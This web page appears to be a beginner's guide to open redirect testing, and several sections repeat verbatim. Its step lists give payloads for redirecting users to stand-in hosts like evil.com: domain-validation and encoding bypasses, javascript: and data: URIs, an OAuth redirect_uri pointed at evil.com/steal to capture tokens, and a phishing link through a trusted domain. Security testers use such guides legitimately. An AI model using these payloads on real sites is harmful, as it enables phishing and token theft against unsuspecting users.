Home GuidesOpen Redirect Testing Guide

Open Redirect Testing Guide

Learn how to find and exploit open redirect vulnerabilities for phishing, OAuth token theft, and SSRF chaining with bypass techniques for common filters.

Beginner

6 steps24 payload examples~60 min

Authorized testing only. Only use these techniques on systems you have explicit permission to test.

Identify redirect parameters

Find URL parameters that control redirects. Common parameter names include: url, redirect, next, return, redir, destination, continue, target, and goto. Check login/logout flows, OAuth callbacks, and link-out pages.

Example payloads

/login?redirect=/dashboard

/auth/callback?next=/home

/click?url=https://example.com

/logout?return_to=/login

Test basic external redirects

Replace the redirect URL with an external domain. If the application redirects to your domain without validation, it has an open redirect vulnerability.

Example payloads

?redirect=https://evil.com

?next=http://attacker.com

?url=//evil.com

?return=https://evil.com/phish

Bypass domain validation

If the application validates the redirect domain, try bypass techniques: subdomain matching, URL parsing quirks, and character tricks that confuse the validator.

Example payloads

?redirect=https://target.com.evil.com

?redirect=https://target.com@evil.com

?redirect=https://evil.com#target.com

?redirect=https://evil.com?target.com

?redirect=https://evil.com\@target.com

Test protocol-relative and special URLs

Try protocol-relative URLs, JavaScript URIs, and data URIs. These can bypass filters that only check for http/https prefixes.

Example payloads

?redirect=//evil.com

?redirect=\/\/evil.com

?redirect=javascript:alert(1)

?redirect=data:text/html,<script>alert(1)</script>

?redirect=/\evil.com

Test encoding bypasses

Apply URL encoding, double encoding, and Unicode normalization to bypass filters. Some applications decode the URL before validation but redirect to the decoded value.

Example payloads

?redirect=https%3A%2F%2Fevil.com

?redirect=https%253A%252F%252Fevil.com (double encoded)

?redirect=https://evil%E3%80%82com (fullwidth dot)

?redirect=%68%74%74%70%73%3A%2F%2F%65%76%69%6C%2E%63%6F%6D

Assess impact and chain with other vulns

Open redirects alone are often low severity, but they gain value when chained: steal OAuth tokens via redirect_uri manipulation, chain with SSRF, or enhance phishing attacks using the trusted domain.

Example payloads

/oauth/authorize?client_id=legit&redirect_uri=https://evil.com/steal

Phishing: https://trusted.com/redirect?url=https://fake-login.com

Related Resources

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

$loading...

Identify redirect parameters

Example payloads

/login?redirect=/dashboard

/auth/callback?next=/home

/click?url=https://example.com

/logout?return_to=/login

Bypass domain validation

If the application validates the redirect domain, try bypass techniques: subdomain matching, URL parsing quirks, and character tricks that confuse the validator.

Example payloads

?redirect=https://target.com.evil.com

?redirect=https://target.com@evil.com

?redirect=https://evil.com#target.com

?redirect=https://evil.com?target.com

?redirect=https://evil.com\@target.com

Test encoding bypasses

Apply URL encoding, double encoding, and Unicode normalization to bypass filters. Some applications decode the URL before validation but redirect to the decoded value.

Example payloads

?redirect=https%3A%2F%2Fevil.com

?redirect=https%253A%252F%252Fevil.com (double encoded)

?redirect=https://evil%E3%80%82com (fullwidth dot)

?redirect=%68%74%74%70%73%3A%2F%2F%65%76%69%6C%2E%63%6F%6D

Assess impact and chain with other vulns

Open redirects alone are often low severity, but they gain value when chained: steal OAuth tokens via redirect_uri manipulation, chain with SSRF, or enhance phishing attacks using the trusted domain.

Example payloads

/oauth/authorize?client_id=legit&redirect_uri=https://evil.com/steal

Phishing: https://trusted.com/redirect?url=https://fake-login.com